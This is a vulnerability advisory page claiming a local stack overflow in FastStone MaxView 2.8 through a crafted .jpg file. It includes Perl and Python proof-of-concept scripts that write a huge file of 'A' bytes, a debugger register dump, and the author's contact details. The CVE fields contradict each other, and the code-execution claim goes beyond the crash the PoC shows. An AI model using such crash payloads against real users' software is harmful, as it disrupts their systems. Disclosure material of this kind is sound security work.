FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC

2015.07.02
Credit: Dr.3v1l
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

######################################### # Title : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC # Program : FastStone MaxView # Author : Dr.3v1l # Date : 2015 01 July # Website : http://www.faststone.org # Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe # Version : 2.8 # Type : (.jpg File) local Stack Overflow PoC ########################################## # # 01. Vulnerability Information # # Class: Buffer overflow [CWE-119] # Impact: Code execution # Remotely Exploitable: No # Locally Exploitable: Yes # CVE Name: CVE-2014-8386 # # 02. Technical Description / Proof of Concept Code # # This vulnerability is caused by a stack buffer overflow when parsing # the display properties parameter. A malicious third party could trigger # execution of arbitrary code within the context of the application, or # otherwise crash the whole application. # # EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # ECX 0013D2A8 # EDX 7767D370 ntdll.KiFastSystemCallRet # EBX 00000000 # ESP 0013D2A8 # EBP 0013D30C # ESI 0013D328 # EDI 000007A4 # EIP 7767D370 ntdll.KiFastSystemCallRet # C 0 ES 0023 32bit 0(FFFFFFFF) # P 1 CS 001B 32bit 0(FFFFFFFF) # A 0 SS 0023 32bit 0(FFFFFFFF) # Z 1 DS 0023 32bit 0(FFFFFFFF) # S 0 FS 003B 32bit 7FFDF000(4000) # T 0 GS 0000 NULL # D 0 # O 0 LastErr ERROR_SUCCESS (00000000) # EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) # ST0 empty -??? FFFF 000000FF 00FF00FF # ST1 empty 4.7021112344749837450e+18 # ST2 empty 4.7021112344749837450e+18 # ST3 empty 4.7021112344749837450e+18 # ST4 empty 4.7021112344749837450e+18 # ST5 empty 4.7021112344749837450e+18 # ST6 empty 4.7021112344749837450e+18 # ST7 empty 4.7021112344749837450e+18 # 3 2 1 0 E S P U O Z D I # FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) # FCW 127F Prec NEAR,53 Mask 1 1 1 1 1 1 # # --------------------------------------------------------------------- # # PoC (PERL) : # # my $file="3v1l.jpg"; # open(my $FILE, ">>$file") or die "Cannot open $file: $!"; # print $FILE "\x41" x 250000000; # close($FILE); # print "$file has been created \n"; # # # PoC (PYTHON) : # # file="3v1l.jpg" # junk="\x41"*250000000 # writeFile = open (file, "w") # writeFile.write(junk) # writeFile.close() # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # Twitter.com/blackdevilsb0ys # Facebook.com/blackdevilsb0ys # Linkedin.com/in/hossein3v1l # Hossein Hezami - Black_Devils B0ys # ####################################################################### # Black_Devils B0ys - blackdevilsb0ys.ir #######################################################################

References:

http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top